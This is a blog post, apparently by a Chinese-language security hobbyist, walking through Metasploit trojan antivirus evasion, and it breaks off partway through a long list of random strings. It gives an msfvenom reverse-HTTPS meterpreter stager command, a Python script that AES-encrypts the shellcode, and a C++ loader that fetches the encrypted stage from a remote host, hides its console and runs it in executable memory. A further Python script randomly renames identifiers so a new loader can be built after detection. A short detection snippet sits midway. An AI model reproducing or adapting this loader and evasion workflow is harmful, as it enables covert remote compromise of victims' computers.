Simple Metasploit Trojan AV Evasion

admin, 2025-06-24 20:36:10
It's been a while since I wrote anything for the public account. I'm bored of games and had nothing to do, and seeing all the grunts heading to Beijing for the HW (护网) exercise reminded me of AV evasion. I've played with it before, but never systematically. For a few years now the industry's standard approach to trojan evasion has been to separate the shellcode from the loader. It's a sound idea, and back then it got past a lot of AV products: the loader is really just a downloader and contains no malicious code; only what it downloads is the actual virus or trojan.
Unfortunately, high-risk dynamic behaviour still gets caught and flagged by AV. One more note: today is 2025-06-24, and the steps below work as of today.
Tools and environment
  1. Windows 11, local machine, latest Windows Defender
  2. Windows 10, virtual machine, latest 360
  3. Ubuntu 24, C2 VPS, latest Metasploit
  4. Python 3
  5. Visual Studio 2022 C++ development environment (x86)
  6. UPX executable packer (compression)

Visual Studio needs a couple of tweaks:

(screenshots: Visual Studio project settings)

Evasion theory

If you don't know attack, how can you know defence? Likewise, if you don't know how AV defends, how can a trojan bypass it? AV detection splits into static and dynamic. Static detection is essentially program signatures, PE structure and the like. Dynamic detection is quite sophisticated these days: sandbox execution, anomalous-behaviour monitoring, traffic monitoring and so on. I'm not good enough to get past dynamic detection, so I focus on static, avoiding malicious program signatures, as follows:

  1. Separate the loader from the shellcode
  2. Encrypt the shellcode
  3. Randomly obfuscate the C++ code
  4. Encrypt the trojan's traffic

First, generate a shellcode with msf on the Ubuntu box; to encrypt the trojan's traffic, it is backed by an HTTPS certificate.

Generate the certificate:

```bash
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" -keyout www.google.com.key -out www.google.com.crt && cat www.google.com.key www.google.com.crt > www.google.com.pem && rm -f www.google.com.key www.google.com.crt
```

Generate the malicious shellcode .bin file:

```bash
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_winhttps LHOST=1.1.1.1 LPORT=11112 PayloadUUIDTracking=true HandlerSSLCert=/xxx/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f raw -o shellcode.bin
```

I'm not very happy with this way of encrypting the traffic, but there's no way around it: from all the material I've studied, HTTPS is the only somewhat reliable option in the msf framework right now. RC4 is also available, but it's as good as no encryption at all. It would be nice if you could plug in your own encryption here.
Shellcode generated this way is obviously a trojan .bin and is easily killed by AV, so I wrote a Python script that AES-256-encrypts the shellcode file.
```python
# encrypt_shellcode.py
# pip install pycryptodome
from Crypto.Cipher import AES
import os

# Generate the raw stager first (same msfvenom command as above)
os.system("msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_winhttps LHOST=1.1.1.1 LPORT=11112 PayloadUUIDTracking=true HandlerSSLCert=/xxx/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f raw -o shellcode.bin")

KEY = b'0123456789abcdef0123456789abcdef'  # 32-byte key (AES-256)
IV  = b'a234567890abcd12'                  # 16-byte IV (CBC mode)

def pad(data):
    # PKCS#7 padding up to a multiple of the 16-byte AES block
    pad_len = 16 - (len(data) % 16)
    return data + bytes([pad_len] * pad_len)

with open('shellcode.bin', 'rb') as f:
    raw = f.read()

cipher = AES.new(KEY, AES.MODE_CBC, IV)
encrypted = cipher.encrypt(pad(raw))

with open('sc1.txt', 'wb') as f:
    f.write(encrypted)

print("[+] Encryption done, saved as sc1.txt; put it in the web directory")
```
The encrypted shellcode goes into sc1.txt, which is placed in the VPS web directory so the loader program can fetch it later.
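From the defender's side, what this step leaves on the wire has a recognisable shape: a body fetched from a .txt path with a throwaway query string, near-maximal entropy, and a length that is a multiple of the AES block size. The Python below is an added example, not part of the original post; it scores a response on those traits, using the post's URL shape and a constructed stand-in for the encrypted body (the host is the post's placeholder, not real infrastructure).

```python
import hashlib
import math
from urllib.parse import urlparse

AES_BLOCK = 16  # CBC ciphertext length is always a multiple of this

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: AES output sits near 8.0, natural text well below 6."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def suspicious_stage(url: str, content_type: str, body: bytes) -> tuple[int, list[str]]:
    """Score an HTTP response body for 'encrypted stage served as text'.
    Each trait adds one point; the reasons list says which ones fired."""
    reasons = []
    parsed = urlparse(url)
    if parsed.path.lower().endswith((".txt", ".html", ".css", ".js")) and parsed.query:
        reasons.append("text-like path with a throwaway query string")
    if content_type.startswith("text/") and any(b < 9 or 13 < b < 32 for b in body[:256]):
        reasons.append("text/* content type but control bytes in the body")
    if len(body) >= AES_BLOCK and len(body) % AES_BLOCK == 0:
        reasons.append("length is a multiple of the AES block size")
    if shannon_entropy(body) > 7.5:
        reasons.append("entropy above 7.5 bits/byte, ciphertext-like")
    return len(reasons), reasons

def constructed_ciphertext(n: int, seed: bytes = b"constructed sample") -> bytes:
    """Deterministic pseudo-random bytes standing in for the AES-CBC body.
    Constructed for this example; it is not shellcode and not real ciphertext."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])

# The post's stage URL shape (junk query string on a .txt path) and a benign control
STAGE_URL = "http://1.1.1.1/sc1.txt?12asss2ss1sss2ssss3"
BENIGN_URL = "http://1.1.1.1/readme.txt"
BENIGN_BODY = b"This is an ordinary readme file.\n" * 40  # constructed plain text

if __name__ == "__main__":
    for url, body in ((STAGE_URL, constructed_ciphertext(4096)), (BENIGN_URL, BENIGN_BODY)):
        score, why = suspicious_stage(url, "text/plain", body)
        print(f"{url}: score {score}/4 {why}")
```

A proxy or NDR rule would apply the same four checks to the response rather than the request, since the request itself looks like any static file fetch.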
(screenshot)
C++ loader code:
```cpp
#include <windows.h>
#include <wininet.h>
#include <bcrypt.h>
#include <iostream>
#include <vector>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "bcrypt.lib")

// Download a file over HTTP into a byte vector
std::vector<BYTE> http_download(const char* url) {
    HINTERNET hInternet = InternetOpenA("Loader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    HINTERNET hFile = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    std::vector<BYTE> buffer;
    BYTE temp[1024];
    DWORD bytesRead = 0;
    while (InternetReadFile(hFile, temp, sizeof(temp), &bytesRead) && bytesRead != 0) {
        buffer.insert(buffer.end(), temp, temp + bytesRead);
    }
    InternetCloseHandle(hFile);
    InternetCloseHandle(hInternet);
    return buffer;
}

// Decrypt AES-256-CBC with the Windows CNG (bcrypt) API
std::vector<BYTE> aes_decrypt(const std::vector<BYTE>& data, const BYTE* key, const BYTE* iv) {
    BCRYPT_ALG_HANDLE hAlg = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    DWORD cbKeyObject, cbData, cbBlockLen;
    std::vector<BYTE> decrypted(data.size());
    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&cbKeyObject, sizeof(DWORD), &cbData, 0);
    BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PUCHAR)&cbBlockLen, sizeof(DWORD), &cbData, 0);
    std::vector<BYTE> keyObject(cbKeyObject);
    BCryptGenerateSymmetricKey(hAlg, &hKey, keyObject.data(), cbKeyObject, (PUCHAR)key, 32, 0);
    std::vector<BYTE> ivCopy(iv, iv + 16);
    ULONG resultLen = 0;
    // No BCRYPT_BLOCK_PADDING flag: the PKCS#7 padding bytes added by the Python
    // script stay at the end of the output rather than being stripped
    BCryptDecrypt(hKey, (PUCHAR)data.data(), (ULONG)data.size(),
        NULL, ivCopy.data(), cbBlockLen,
        decrypted.data(), (ULONG)decrypted.size(), &resultLen, 0);
    decrypted.resize(resultLen);
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlg, 0);
    return decrypted;
}

// AES KEY and IV (must match the Python script)
const BYTE key[32] = {
    '0','1','2','3','4','5','6','7','8','9',
    'a','b','c','d','e','f',
    '0','1','2','3','4','5','6','7','8','9',
    'a','b','c','d','e','f'
};
const BYTE iv[16] = {
    'a','2','3','4','5','6','7','8',
    '9','0','a','b','c','d','1','2'
};

int main() {
    void unusedPrimeCheck();  // a function declaration, not a call: nothing runs here
    HWND hwnd = GetConsoleWindow();
    ShowWindow(hwnd, SW_HIDE);  // hide the console window
    const char* url = "http://1.1.1.1/sc1.txt?12asss2ss1sss2ssss3";  // your remote sc path
    std::vector<BYTE> encrypted = http_download(url);
    if (encrypted.empty()) {
        std::cerr << "[-] fail" << std::endl;
        return -1;
    }
    std::cerr << "[-] etsttest" << std::endl;
    void fakeMemoryShuffle();  // declaration only, as above
    std::vector<BYTE> sc12 = aes_decrypt(encrypted, key, iv);
    void* exec = VirtualAlloc(NULL, sc12.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(exec, sc12.data(), sc12.size());
    std::cout << "[+] loading.." << std::endl;
    ((void(*)())exec)();
    return 0;
}
```
`http://1.1.1.1/sc1.txt?12asss2ss1sss2ssss3` is the shellcode address. This C++ code is a simple shellcode loader: it downloads sc1.txt from the remote host, decrypts it and loads it into memory for execution. It evades at first, but once it's running and you perform a high-risk action it gets flagged, and then this code is burned, which is a very passive position to be in.
So a tool for randomly encrypting and obfuscating the C++ code was needed. At first I looked at many C++ obfuscation approaches, but the results weren't great, or the tools were too much hassle, so I had to roll my own: a Python script that does simple obfuscation of the C++ code, followed by UPX compression. The result was surprisingly good: even after a high-risk action gets the exe killed and AV has learned its PE structure, the Python script can regenerate a fresh C++ source, and compiling that gives a brand-new exe.
Python script to randomly obfuscate the C++ code:
```python
# encoding: utf-8
import re, random, string

def random_string_variable_length(min_len=5, max_len=15):
    length = random.randint(min_len, max_len)
    first_char = random.choice(string.ascii_letters)  # first character must be a letter
    rest_chars = random.choices(string.ascii_letters + string.digits, k=length - 1)
    return first_char + ''.join(rest_chars)

def generate_cpp_string_set():
    # A C++ initializer list of 15 to 500 random string literals
    count = random.randint(15, 500)
    strings = [f'"{random_string_variable_length()}"' for _ in range(count)]
    return '{ ' + ', '.join(strings) + ' }'

# Random identifiers substituted into the template below
dowload_fun_name = random_string_variable_length()
decrypt_fun_name = random_string_variable_length()
key_name = random_string_variable_length()
iv_name = random_string_variable_length()
url_name = random_string_variable_length()
fun_url_name = random_string_variable_length()
random_fun_name = random_string_variable_length()
shellcode_name = random_string_variable_length()
exec_name = random_string_variable_length()
string_name = random_string_variable_length(min_len=10, max_len=150)
#print(dowload_fun_name)

# Spare junk functions; as written they are never inserted into the template
list_fun_code = ['''void {random_fun_name}() {
    for (int i = 2; i < 100; ++i) {
        isPrime(i);  // result deliberately discarded
    }
}''',
'''void {random_fun_name}() {
    char buf1[32] = { 0 };
    char buf2[32] = { 0 };
    for (int i = 0; i < 32; ++i) {
        buf1[i] = (char)(i * 3);
        buf2[i] = buf1[31 - i];
    }
}''',
'''void {random_fun_name}() {
    for (int i = 0; i < 5; ++i) {
        if (i % 2 == 0) {
            Sleep(123 + i * 2);
        }
        else {
            Sleep(100 - i);
        }
    }
}''']

cpp_code = """#include <windows.h>
#include <wininet.h>
#include <bcrypt.h>
#include <fstream>
#include <iostream>
#include <string>
#include <vector>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "bcrypt.lib")

void {random_fun_name}() {
    for (int i = 0; i < 5; ++i) {
        if (i % 2 == 0) {
            Sleep(123 + i * 2);
        }
        else {
            Sleep(100 - i);
        }
    }
}

std::vector<BYTE> {dowload_fun_name}(const char* {fun_url_name}) {
    HINTERNET hInternet = InternetOpenA("Loader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    HINTERNET hFile = InternetOpenUrlA(hInternet, {fun_url_name}, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    std::vector<BYTE> buffer;
    BYTE temp[1024];
    DWORD bytesRead = 0;
    while (InternetReadFile(hFile, temp, sizeof(temp), &bytesRead) && bytesRead != 0) {
        buffer.insert(buffer.end(), temp, temp + bytesRead);
    }
    InternetCloseHandle(hFile);
    InternetCloseHandle(hInternet);
    return buffer;
}

std::vector<BYTE> {decrypt_fun_name}(const std::vector<BYTE>& data, const BYTE* key, const BYTE* iv) {
    BCRYPT_ALG_HANDLE hAlg = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    DWORD cbKeyObject, cbData, cbBlockLen;
    std::vector<BYTE> decrypted(data.size());
    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&cbKeyObject, sizeof(DWORD), &cbData, 0);
    BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PUCHAR)&cbBlockLen, sizeof(DWORD), &cbData, 0);
    std::vector<BYTE> keyObject(cbKeyObject);
    BCryptGenerateSymmetricKey(hAlg, &hKey, keyObject.data(), cbKeyObject, (PUCHAR)key, 32, 0);
    std::vector<BYTE> ivCopy(iv, iv + 16);
    ULONG resultLen = 0;
    BCryptDecrypt(hKey, (PUCHAR)data.data(), (ULONG)data.size(),
        NULL, ivCopy.data(), cbBlockLen,
        decrypted.data(), (ULONG)decrypted.size(), &resultLen, 0);
    decrypted.resize(resultLen);
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlg, 0);
    return decrypted;
}

bool DownloadFile(const char* url, const char* localFile) {
    HINTERNET hInternet = InternetOpenA("MyDownloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!hInternet) {
        std::cerr << "InternetOpenA failed";
        return false;
    }
    HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    if (!hUrl) {
        std::cerr << "InternetOpenUrlA failed";
        InternetCloseHandle(hInternet);
        return false;
    }
    std::ofstream out(localFile, std::ios::binary);
    if (!out) {
        std::cerr << "Failed to open output file";
        InternetCloseHandle(hUrl);
        InternetCloseHandle(hInternet);
        return false;
    }
    char buffer[4096];
    DWORD bytesRead;
    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {
        out.write(buffer, bytesRead);
    }
    out.close();
    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);
    return true;
}

const BYTE {key_name}[32] = {
    '0','1','2','3','4','5','6','7','8','9',
    'a','b','c','d','e','f',
    '0','1','2','3','4','5','6','7','8','9',
    'a','b','c','d','e','f'
};
const BYTE {iv_name}[16] = {
    'a','2','3','4','5','6','7','8',
    '9','0','a','b','c','d','1','2'
};

int main() {
    const char* imageUrl = "https://upload.xxx.org/wikipedia/commons/4/47/PNG_transp{random_stringa}arency_demonstration_1.png";
    const char* outputFile = "downloaded_image.png";
    if(DownloadFile(imageUrl, outputFile)) {
        std::cout << "[+] Image downloaded successfully: " << outputFile << std::endl;
    }
    else {
        std::cerr << "[-] Failed to download image." << std::endl;
    }
    void {random_fun_name}();  // meant to call the junk function for complexity; as written this is only a declaration
    void unusedPrimeCheck();
    HWND hwnd = GetConsoleWindow();
    ShowWindow(hwnd, SW_HIDE);
    const char* {url_name} = "http://1.1.1.1/sc1.txt?12as{random_stringa}";
    std::vector<BYTE> encrypted = {dowload_fun_name}({url_name});
    if(encrypted.empty()) {
        std::cerr << "[-] {string_name}" << std::endl;
        return -1;
    }
    void {random_fun_name}();  // same: a declaration, not a call
    std::cout << "[+] {string_name}.." << std::endl;
    std::cerr << "[-] {string_name}" << std::endl;
    void fakeMemoryShuffle();
    std::vector<BYTE> {shellcode_name} = {decrypt_fun_name}(encrypted, {key_name}, {iv_name});
    void* {exec_name} = VirtualAlloc(NULL, {shellcode_name}.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy({exec_name}, {shellcode_name}.data(), {shellcode_name}.size());
    std::cout << "[+] {string_name}.." << std::endl;
    std::vector<std::string> {for_names} = {dict_names};
    for(const std::string& {for_name} : {for_names}) {
        std::cout << {for_name} << std::endl;
    }
    ((void(*)()){exec_name})();
    return 0;
}
"""

# Plain text substitution of every placeholder in the template
cpp_code = cpp_code.replace('{dowload_fun_name}', dowload_fun_name)
cpp_code = cpp_code.replace('{decrypt_fun_name}', decrypt_fun_name)
cpp_code = cpp_code.replace('{shellcode_name}', shellcode_name)
cpp_code = cpp_code.replace('{key_name}', key_name)
cpp_code = cpp_code.replace('{iv_name}', iv_name)
cpp_code = cpp_code.replace('{string_name}', string_name)
cpp_code = cpp_code.replace('{url_name}', url_name)
cpp_code = cpp_code.replace('{random_stringa}', random_string_variable_length(min_len=6, max_len=20))
cpp_code = cpp_code.replace('{exec_name}', exec_name)
cpp_code = cpp_code.replace('{fun_url_name}', fun_url_name)
cpp_code = cpp_code.replace('{random_fun_name}', random_fun_name)
cpp_code = cpp_code.replace('{for_name}', random_string_variable_length())
cpp_code = cpp_code.replace('{for_names}', random_string_variable_length())
cpp_code = cpp_code.replace('{dict_names}', generate_cpp_string_set())
print(cpp_code)
#print(generate_cpp_string_set())
```
(screenshots: output of the obfuscation script)
As the screenshots show, many variable names, function names and so on have been obfuscated.
Obfuscated C++ code:
(screenshot)
```cpp
#include <windows.h>
#include <wininet.h>
#include <bcrypt.h>
#include <fstream>
#include <iostream>
#include <vector>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "bcrypt.lib")

void MF59F3AarmM9Ubz() {
    for (int i = 0; i < 5; ++i) {
        if (i % 2 == 0) {
            Sleep(123 + i * 2);
        }
        else {
            Sleep(100 - i);
        }
    }
}

std::vector<BYTE> vb5RxBAR(const char* bQ8k3JpQujJX9Q) {
    HINTERNET hInternet = InternetOpenA("Loader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    HINTERNET hFile = InternetOpenUrlA(hInternet, bQ8k3JpQujJX9Q, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    std::vector<BYTE> buffer;
    BYTE temp[1024];
    DWORD bytesRead = 0;
    while (InternetReadFile(hFile, temp, sizeof(temp), &bytesRead) && bytesRead != 0) {
        buffer.insert(buffer.end(), temp, temp + bytesRead);
    }
    InternetCloseHandle(hFile);
    InternetCloseHandle(hInternet);
    return buffer;
}

std::vector<BYTE> r5nCo(const std::vector<BYTE>& data, const BYTE* key, const BYTE* iv) {
    BCRYPT_ALG_HANDLE hAlg = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    DWORD cbKeyObject, cbData, cbBlockLen;
    std::vector<BYTE> decrypted(data.size());
    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&cbKeyObject, sizeof(DWORD), &cbData, 0);
    BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PUCHAR)&cbBlockLen, sizeof(DWORD), &cbData, 0);
    std::vector<BYTE> keyObject(cbKeyObject);
    BCryptGenerateSymmetricKey(hAlg, &hKey, keyObject.data(), cbKeyObject, (PUCHAR)key, 32, 0);
    std::vector<BYTE> ivCopy(iv, iv + 16);
    ULONG resultLen = 0;
    BCryptDecrypt(hKey, (PUCHAR)data.data(), (ULONG)data.size(),
        NULL, ivCopy.data(), cbBlockLen,
        decrypted.data(), (ULONG)decrypted.size(), &resultLen, 0);
    decrypted.resize(resultLen);
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlg, 0);
    return decrypted;
}

bool DownloadFile(const char* url, const char* localFile) {
    HINTERNET hInternet = InternetOpenA("MyDownloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!hInternet) {
        std::cerr << "InternetOpenA failed";
        return false;
    }
    HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);
    if (!hUrl) {
        std::cerr << "InternetOpenUrlA failed";
        InternetCloseHandle(hInternet);
        return false;
    }
    std::ofstream out(localFile, std::ios::binary);
    if (!out) {
        std::cerr << "Failed to open output file";
        InternetCloseHandle(hUrl);
        InternetCloseHandle(hInternet);
        return false;
    }
    char buffer[4096];
    DWORD bytesRead;
    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {
        out.write(buffer, bytesRead);
    }
    out.close();
    InternetCloseHandle(hUrl);
    InternetCloseHandle(hInternet);
    return true;
}

const BYTE gBTukrt[32] = {
    '0','1','2','3','4','5','6','7','8','9',
    'a','b','c','d','e','f',
    '0','1','2','3','4','5','6','7','8','9',
    'a','b','c','d','e','f'
};
const BYTE Q1voA[16] = {
    'a','2','3','4','5','6','7','8',
    '9','0','a','b','c','d','1','2'
};

int main() {
    const char* imageUrl = "https://upload.xxx.org/wikipedia/commons/4/47/PNG_transpKPZqu7AcUarency_demonstration_1.png";
    const char* outputFile = "downloaded_image.png";
    if (DownloadFile(imageUrl, outputFile)) {
        std::cout << "[+] Image downloaded successfully: " << outputFile << std::endl;
    }
    else {
        std::cerr << "[-] Failed to download image." << std::endl;
    }
    void MF59F3AarmM9Ubz();  // meant to call the junk function for complexity; as written this is only a declaration
    void unusedPrimeCheck();
    HWND hwnd = GetConsoleWindow();
    ShowWindow(hwnd, SW_HIDE);
    const char* pboKdjpS0T = "http://1.1.1.1/sc1.txt?KPZqu7AcU";
    std::vector<BYTE> encrypted = vb5RxBAR(pboKdjpS0T);
    if (encrypted.empty()) {
        std::cerr << "[-] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg" << std::endl;
        return -1;
    }
    void MF59F3AarmM9Ubz();  // same: a declaration, not a call
    std::cout << "[+] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg.." << std::endl;
    std::cerr << "[-] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg" << std::endl;
    void fakeMemoryShuffle();
    std::vector<BYTE> gC7XuGj = r5nCo(encrypted, gBTukrt, Q1voA);
    void* CUbuNT = VirtualAlloc(NULL, gC7XuGj.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(CUbuNT, gC7XuGj.data(), gC7XuGj.size());
    std::cout << "[+] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg.." << std::endl;
    // Random string set emitted by generate_cpp_string_set()
    std::vector<std::string> Ocr4QxIOyTZ0 = {
        "MV8MhIL", "I1gIkXKjIR606", "vl18lFxZMIfFlBM", "HuSDyl", "r3xPqM8WPrB2dK", "LpbYsCG1nnsiif2",
        "c2smL4yu2k", "nw2Nx92EudvF3", "RKyAhdfmwbVO", "oRQ7d8mYUADg1d", "UR0wUyaLm", "ypu0U3i7xwajzEK",
        "oAPan", "dOlzOzI", "UXrlv", "CBGwHqG", "zgQP2FlN02w6C9u", "fGqSL", "KpVLWhVSd", "ClOJcCsfgluv336",
        "M4PM3", "xJLLB2w", "nCTy5kk5", "Ux3sNipbOH", "RlOMwc", "ETIsv34zWQ6", "oW2LJf", "ZpBtatQy",
        "nT13C", "i9LRHTu", "RlOF5k5zS9PYP", "xiJRiAFbEgV", "Wn5g48S46", "WemPFaPk1", "IZ4VkMzZlXz",
        "F9JlaBBgRrQ56", "HPRlMySEM", "PDxz1E7I7wufZW", "U4R8pcFKJJhU", "fnsffWLAk1TqZ", "ChuVzZA94d1i",
        "bzYLk", "A5dMzdiLiSveAIc", "J3wXbqMm", "FZ9DAuy9fHQkfR", "S0i4taJSjs6", "A08Gx", "Sw9vVhomh",
        "QSS027yL", "Jw4qCySgD", "Zx0Z28", "K3ZpecM", "vYZC6nqXq6aq", "KCzyM", "wA6AHXVsSwWDpV",
        "zfrbGPdf", "nBiiQLzwLG4P55F", "MO6KbzD7ML", "ykhXKCnADxQDO0s", "EenVdCdZt1", "oTgN2k",
        "z1R6mljmAy7H9h", "dwxhAwYQX", "ZG5ZwCai9", "XounDJ7", "s6k6CdFa3JYcMY", "Y3DZxUI",
        "D504HJMOGKjoaK", "unVRdXEvUT", "YMTL8sTQm6OvxC", "Iqqoja", "OfrLmUm", "cN9SsG", "lQ5TOw76",
        "Led02JL66aj", "AMMW1", "UuEdQU5hHRY", "BBpfhcLWuDdgNGK", "Wv32hznAQg", "yX6Bhs8ETmYan",
        "ryKCzhY8dg4M9r", "YCxZEJPv", "UdV41DnmyYdfRSS", "blgo8Y", "iTe9gpupV8V", "RvBGwBT", "NBbz0U",
        "L9qiB9CK4f", "TAs13s1z0HVC", "jknjCVcnK", "sPGUc2MqDu", "tGAcF3UFE4i5k", "GPh5z", "RkpEpS4Lemr",
        "MyoJ5RaITzKgKx", "ZCy46UjEoN34", "T6Nns", "X87x8PjouvRWX", "bGcwZqnM", "Sgek5Nj7Pa",
        "fQXdj6Ons4h", "v2guORne7", "Nz1DUSvXZ", "D6Pbx9NUvseuZf", "D8mciUo", "y3OC05SERg", "bpxbqx",
        "xZ2aw", "gIKi3xWX08", "POQldYB853OFgA", "nZ2Su", "MBVMYBwyB", "KxZmLNxdhmq2lT", "sppXaD",
        "RdNmxl7ZvKi7hB", "xA98Blc18", "WiSd4jOs", "RhL7fcNg", "fr5YvrLRy6A0tK", "Zc0AqHtYHtSi6C",
        "uy9EzchNn", "ijEpWimy", "GQIID", "YmGmQ9", "kzqKBVDO4fd", "gX6poRHQfX8", "RdiJ4GBoyuCr",
        "cmzt2ZVt", "Apn4fDUPiX", "SAoVBqbZfp01", "ByWs5rR9rj3", "UHnNAoF", "VlRLTo0C44ou6x1",
        "FlCdOVS0WU", "lgAmV97dZx9e", "kf3AzXsP", "Q1g4mYxp35DMM", "zHc0WuM4rlpH", "YBtQd",
        "YP3rUGARo0GvN", "H0g7eCrawIooSd", "YZe6hEo894gRC", "lBVnDhrv", "g4Z6r", "aYAts8fbDZWhibf",
        "vzDo8", "Fo5T2", "pPcJUh1", "QPCOHGCYgcgL", "nrHqvaB4jG", "k4CwoiiOkE0fNhs", "ONJuEf",
        "axZh4g1si5E", "L5GJi", "fyyaqWZ", "Y73OMN", "ztRZKPOHExmS", "AgZqHRmKgJZu", "a940sOFgKhryQq",
        "HMt581", "qQpkMmUAjQQDj", "NbhfWgaDGGCHMWh", "viMtzvikc6nYM", "rWkt8", "SwCks",
        "qNT8l8xfTvu1s9", "R3U4euMBamIyc", "mJfltWyf", "liNVxOqYh700P", "Vr4sPj7t", "bsD5VkT2U",
        "BT8xe5lv9pk", "CRmefA0uKwiS", "oJVDK", "XElMHWs8", "NX0G5J6ZwR", "W92go", "KLzIYi97W",
        "sNXsOXWHVxud", "D6PpzNcSIDY", "bVqoc1Pp5A", "unrF6fEMCa", "AMjMWWnUj0DsSXP", "HX3sdK4kL0jqCkp",
        "rmqKFvIPUZQG", "OEqlROEnI4R", "ZBvBGDPSLF", "EUhE5Pto", "yXY5ww5Pjd", "iTzNdfu",
        "tko1oxKWTFYM7Kg", "uCdyc2KT1AFkOq", "iQtCjxYCX", "UkXUGeVf2", "DVGjewf1", "ahK2HQqZpwt",
        "kTSlYbPDjt0AatS", "AAUXHRWVIPuu6eA", "WMXeIIqgNahz5I", "ah6xen9LOu", "Ykmx2b", "wGfum3",
        "C67G74T", "Od1opn2onC", "TIAs7Bp2", "dbwnS", "el4Ks7JraG", "dBkuK5K1lsE", "snAPf",
        "jGIte2Cg9yL", "MrmfTvlnOkGSYHp", "RnlfhwOYX1zcD", "RRnMoJBdw4u481", "Ze61nmcW", "eQSU8OD",
        "iMczmCr3kH81Y9O", "kSN2U5hjf2VwgR", "xrDK1ci8g9", "kFzrZf", "Bp33V7h", "P9ooJd6KLuWrh",
        "YzbACQMlY9ii", "NG6I1iI31q", "mZRKQ2oxcuG", "ofSqejB56WI", "Psamp5ahZBN", "PrUL9JCrTyfY",
        "PAWmQiEb", "Qut2HL3IBra8y", "s6poywOUTHb5", "X6rprW58riTWdgY", "U8qPWV9", "tBCwnjQPE",
        "qNtoTqpA9CwlS8", "P6m17ONn", "wYuSi3NV2gg", "obXFKiL6SgkDF", "xhlRmVu", "jswAtipWdi",
        "M5NWtWriogY", "fak5URu", "oSv1q04jYrHt9", "mkATMi", "Eql3bgiXSR", "RbYinP1u", "i3sLKKYrhzj",
        "LVkSqZbTctLu9s", "IxjzcjQ6COFVNNo", "lIIEbIvkgTPn", "EzeTLEPP07e", "UHyTliyEEC9sO",
        "y1zC7xCFDeDG", "PNtTG8kaaUs1", "HVZwkzSBtv", "uHCUQ1wtj7TJE", "CuGgZM6l6", "jVe0rsgI",
        "qTCOuepJ8", "uqCWZ54NBqp", "bast8uSJTHU2Pj", "UKcb9J9ZWZ8Dw", "PoR0SC4", "va0TB6gSUIBTC",
        "Jh47PFnTtNcF", "ZEqV506O2LfKPi", "mNWXDCLZPIjXe", "P1TRKsxjt06TSJS", "n9uSW", "HWyjfml7lhz8i",
